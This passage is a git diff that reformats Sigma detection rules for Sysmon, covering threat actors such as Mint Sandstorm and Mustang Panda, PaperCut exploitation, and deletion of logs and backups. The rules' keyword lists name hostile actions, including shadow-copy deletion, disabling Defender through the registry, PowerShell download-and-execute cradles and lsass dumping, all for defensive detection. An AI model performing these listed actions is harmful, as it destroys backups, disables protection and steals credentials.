DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog - condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*)) + condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)) falsepositives: - Unlikely level: critical diff --git a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml index 6d4a1f1ef..c873505cf 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml @@ -29,101 +29,99 @@ detection: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: Image|endswith: \wget.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_curl: Image|endswith: \curl.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog filter_main: - CommandLine|contains|all: + CommandLine|contains|all: - download.microsoft.com - manageengine.com - msiexec - condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*) and not - filter_main) + condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main) falsepositives: - Unlikely level: critical diff --git a/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml index 0f789bcc0..c6d48f180 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml @@ -1,8 +1,7 @@ title: Potential APT Mustang Panda Activity Against Australian Gov id: 7806bb49-f653-48d3-a915-5115c1a85234 status: experimental -description: Detects specific command line execution used by Mustang Panda in a targeted - attack against the Australian government as reported by Lab52 +description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 references: - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - copy SolidPDFCreator.dll - C:\Users\Public\Libraries\PhotoTvRHD\SolidPDFCreator.dll selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - \Windows\CurrentVersion\Run - SolidPDF diff --git a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml index 043ccd9c8..63b0cee51 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - powershell - -nop -w hidden @@ -27,7 +27,7 @@ detection: - setup.msi - -OutFile selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'msiexec ' - '/i ' - 'setup.msi ' diff --git a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml index 74e250f4d..ec104e160 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml @@ -1,8 +1,7 @@ title: PaperCut MF/NG Potential Exploitation id: 0934ac71-a331-4e98-a034-d49c491fbbcb status: test -description: Detects suspicious child processes of "pc-app.exe". Which could indicate - potential exploitation of PaperCut +description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software - https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml diff --git a/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml index 2592f598e..cab9dde9b 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: QP's\*(58vaP!tF4 + CommandLine|contains: QP's\*(58vaP!tF4 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml b/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml index 8089afceb..4bc9eaab9 100644 --- a/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml +++ b/sigma/sysmon/file/file_change/file_change_win_2022_timestomping.yml @@ -1,13 +1,9 @@ title: File Creation Date Changed to Another Year id: 558eebe5-f2ba-4104-b339-36f7902bcc1a status: test -description: 'Attackers may change the file creation time of a backdoor to make it - look like it was installed with the operating system. - - Note that many processes legitimately change the creation time of a file; it does - not necessarily indicate malicious activity. - - ' +description: | + Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. + Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity. references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth (Nextron Systems) @@ -33,20 +29,19 @@ detection: filter2: CreationUtcTime|startswith: '202' gen_filter_updates: - - Image: - - C:\Windows\system32\ProvTool.exe - - C:\Windows\System32\usocoreworker.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - TargetFilename|startswith: C:\ProgramData\USOPrivate\UpdateStore\ - - TargetFilename|endswith: - - .tmp - - .temp + - Image: + - C:\Windows\system32\ProvTool.exe + - C:\Windows\System32\usocoreworker.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - TargetFilename|startswith: C:\ProgramData\USOPrivate\UpdateStore\ + - TargetFilename|endswith: + - .tmp + - .temp gen_filter_tiworker: Image|startswith: C:\WINDOWS\ Image|endswith: \TiWorker.exe TargetFilename|endswith: .cab - condition: file_change and ((( selection1 and not filter1 ) or ( selection2 and - not filter2 )) and not 1 of gen_filter*) + condition: file_change and ((( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter*) falsepositives: - Changes made to or by the local NTP service level: high diff --git a/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml b/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml index 2c5f304b7..869c3b374 100644 --- a/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml +++ b/sigma/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml @@ -1,12 +1,10 @@ title: Unusual File Modification by dns.exe id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 related: - - id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 - type: similar + - id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 # FileDelete version + type: similar status: test -description: Detects an unexpected file being modified by dns.exe which my indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html author: Tim Rauch (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml b/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml index 5a1aea18d..386721b4a 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml @@ -1,8 +1,7 @@ title: Potential PrintNightmare Exploitation Attempt id: 5b2bbc47-dead-4ef7-8908-0cf73fcbecbf status: test -description: Detect DLL deletions from Spooler Service driver folder. This might be - a potential exploitation attempt of CVE-2021-1675 +description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 references: - https://github.com/hhlxf/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml index 4e4ba0343..e38827a78 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml @@ -1,9 +1,7 @@ title: Backup Files Deleted id: 06125661-3814-4e03-bfa2-1e4411c60ac3 status: test -description: Detects deletion of files with extensions often used for backup files. - Adversaries may delete or remove built-in operating system data and turn off services - designed to aid in the recovery of a corrupted system to prevent recovery. +description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files author: frack113 diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml index 374ef2852..1cc83f0ef 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml @@ -1,8 +1,7 @@ title: EventLog EVTX File Deleted id: 63c779ba-f638-40a0-a593-ddd45e8b1ddc status: test -description: Detects the deletion of the event log files which may indicate an attempt - to destroy forensic evidence +description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml index 53d46006c..2b5c4cf87 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml @@ -1,8 +1,7 @@ title: Exchange PowerShell Cmdlet History Deleted id: a55349d8-9588-4c5a-8e3b-1925fe2a4ffe status: test -description: Detects the deletion of the Exchange PowerShell cmdlet History logs which - may indicate an attempt to destroy forensic evidence +description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence references: - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml index a0e793454..feede199b 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml @@ -1,8 +1,7 @@ title: IIS WebServer Access Logs Deleted id: 3eb8c339-a765-48cc-a150-4364c04652bf status: test -description: Detects the deletion of IIS WebServer access logs which may indicate - an attempt to destroy forensic evidence +description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence references: - https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml index fc269ed34..07f4633b0 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml @@ -1,8 +1,7 @@ title: PowerShell Console History Logs Deleted id: ff301988-c231-4bd0-834c-ac9d73b86586 status: test -description: Detects the deletion of the PowerShell console History logs which may - indicate an attempt to destroy forensic evidence +description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml index 9fdf88a24..7083dcfca 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml @@ -1,8 +1,7 @@ title: Prefetch File Deleted id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 status: test -description: Detects the deletion of a prefetch file which may indicate an attempt - to destroy forensic evidence +description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence author: Cedric MAURUGEON date: 2021/09/29 modified: 2023/02/15 @@ -24,7 +23,7 @@ detection: TargetFilename|endswith: .pf filter: Image: C:\windows\system32\svchost.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: file_delete and (selection and not filter) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml index e3abee022..cef680c2d 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml @@ -1,8 +1,7 @@ title: TeamViewer Log File Deleted id: b1decb61-ed83-4339-8e95-53ea51901720 status: test -description: Detects the deletion of the TeamViewer log files which may indicate an - attempt to destroy forensic evidence +description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md author: frack113 diff --git a/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml b/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml index c917c0c27..256bdea17 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml @@ -1,8 +1,7 @@ title: Tomcat WebServer Logs Deleted id: 270185ff-5f50-4d6d-a27f-24c3b8c9fef8 status: test -description: Detects the deletion of tomcat WebServer logs which may indicate an attempt - to destroy forensic evidence +description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence references: - Internal Research - https://linuxhint.com/view-tomcat-logs-windows/ diff --git a/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 6c00954c2..78abfde9b 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -1,8 +1,7 @@ title: File Deleted Via Sysinternals SDelete id: 6ddab845-b1b8-49c2-bbf7-1a11967f64bc status: test -description: Detects the deletion of files by the Sysinternals SDelete utility. It - looks for the common name pattern used to rename files. +description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md diff --git a/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml b/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml index 694819e1a..2c46f02ea 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml @@ -1,12 +1,10 @@ title: Unusual File Deletion by Dns.exe id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 related: - - id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 - type: similar + - id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 # FileChange version + type: similar status: test -description: Detects an unexpected file being deleted by dns.exe which my indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html author: Tim Rauch (Nextron Systems) diff --git a/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml b/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml index b7d3d8598..10d70bf3c 100644 --- a/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml +++ b/sigma/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml @@ -1,12 +1,10 @@ title: ADS Zone.Identifier Deleted By Uncommon Application id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae related: - - id: 7eac0a16-5832-4e81-865f-0268a6d19e4b - type: similar + - id: 7eac0a16-5832-4e81-865f-0268a6d19e4b + type: similar status: experimental -description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. - Attackers can leverage this in order to bypass security restrictions that make - use of the ADS such as Microsoft Office apps. +description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. references: - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/ - Internal Research @@ -29,6 +27,7 @@ detection: selection: TargetFilename|endswith: :Zone.Identifier filter_main_generic: + # Note: in some envs this activity might be performed by other software. Apply additional filters as necessary Image|endswith: - :\Program Files\PowerShell\7-preview\pwsh.exe - :\Program Files\PowerShell\7\pwsh.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml b/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml index c829a066f..b81e1a05b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml +++ b/sigma/sysmon/file/file_event/file_event_win_access_susp_teams.yml @@ -1,8 +1,7 @@ title: Suspicious File Event With Teams Objects id: 6902955a-01b7-432c-b32a-6f5f81d8f624 status: test -description: Detects an access to authentication tokens and accounts of Microsoft - Teams desktop application. +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens diff --git a/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml b/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml index 760c79eaf..8a189d5db 100644 --- a/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml +++ b/sigma/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml @@ -1,13 +1,9 @@ title: Suspicious Unattend.xml File Access id: 1a3d42dd-3763-46b9-8025-b5f17f340dfb status: test -description: 'Attempts to access unattend.xml, where credentials are commonly stored, - within the Panther directory where installation logs are stored. - - If these files exist, their contents will be displayed. They are used to store - credentials/answers during the unattended windows install process - - ' +description: | + Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. + If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml b/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml index 16e0a4bfb..08c27c272 100644 --- a/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml +++ b/sigma/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml @@ -1,8 +1,7 @@ title: ADSI-Cache File Creation By Uncommon Tool id: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb status: test -description: Detects the creation of an "Active Directory Schema Cache File" (.sch) - file by an uncommon tool. +description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. references: - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961 - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/ @@ -25,19 +24,19 @@ detection: TargetFilename|contains: \Local\Microsoft\Windows\SchCache\ TargetFilename|endswith: .sch filter_main_generic: - - Image|endswith: - - :\Program Files\Cylance\Desktop\CylanceSvc.exe - - :\Windows\CCM\CcmExec.exe - - :\windows\system32\dllhost.exe - - :\Windows\system32\dsac.exe - - :\Windows\system32\efsui.exe - - :\windows\system32\mmc.exe - - :\windows\system32\svchost.exe - - :\Windows\System32\wbem\WmiPrvSE.exe - - :\windows\system32\WindowsPowerShell\v1.0\powershell.exe - - Image|contains: - - :\Windows\ccmsetup\autoupgrade\ccmsetup - - :\Program Files\SentinelOne\Sentinel Agent + - Image|endswith: + - :\Program Files\Cylance\Desktop\CylanceSvc.exe + - :\Windows\CCM\CcmExec.exe + - :\windows\system32\dllhost.exe + - :\Windows\system32\dsac.exe + - :\Windows\system32\efsui.exe + - :\windows\system32\mmc.exe + - :\windows\system32\svchost.exe + - :\Windows\System32\wbem\WmiPrvSE.exe + - :\windows\system32\WindowsPowerShell\v1.0\powershell.exe + - Image|contains: + - :\Windows\ccmsetup\autoupgrade\ccmsetup # C:\Windows\ccmsetup\autoupgrade\ccmsetup.TMC00002.40.exe + - :\Program Files\SentinelOne\Sentinel Agent # C:\Program Files\SentinelOne\Sentinel Agent 21.7.7.40005\SentinelAgent.exe filter_main_office: Image|contains|all: - :\Program Files\ @@ -46,10 +45,11 @@ detection: filter_optional_ldapwhoami: Image|endswith: \LANDesk\LDCLient\ldapwhoami.exe filter_optional_citrix: + # Example: + # TargetFilename=C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\SchCache\REDACTED.com.sch Image|endswith: :\Program Files\Citrix\Receiver StoreFront\Services\DefaultDomainServices\Citrix.DeliveryServices.DomainServices.ServiceHost.exe condition: file_event and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity - by MMC, Powershell, Windows etc. + - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml b/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml index d7683c46c..b4b605872 100644 --- a/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml +++ b/sigma/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml @@ -1,11 +1,10 @@ title: Advanced IP Scanner - File Event id: fed85bf9-e075-4280-9159-fbe8a023d6fa related: - - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f - type: derived + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + type: derived status: test -description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for - ransomware groups. +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html diff --git a/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml index 1a3a12921..c94566776 100644 --- a/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_anydesk_artefact.yml @@ -1,18 +1,10 @@ title: Anydesk Temporary Artefact id: 0b9ad457-2554-44c1-82c2-d56a99c42377 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml b/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml index 63e6d00cc..26ec23d73 100644 --- 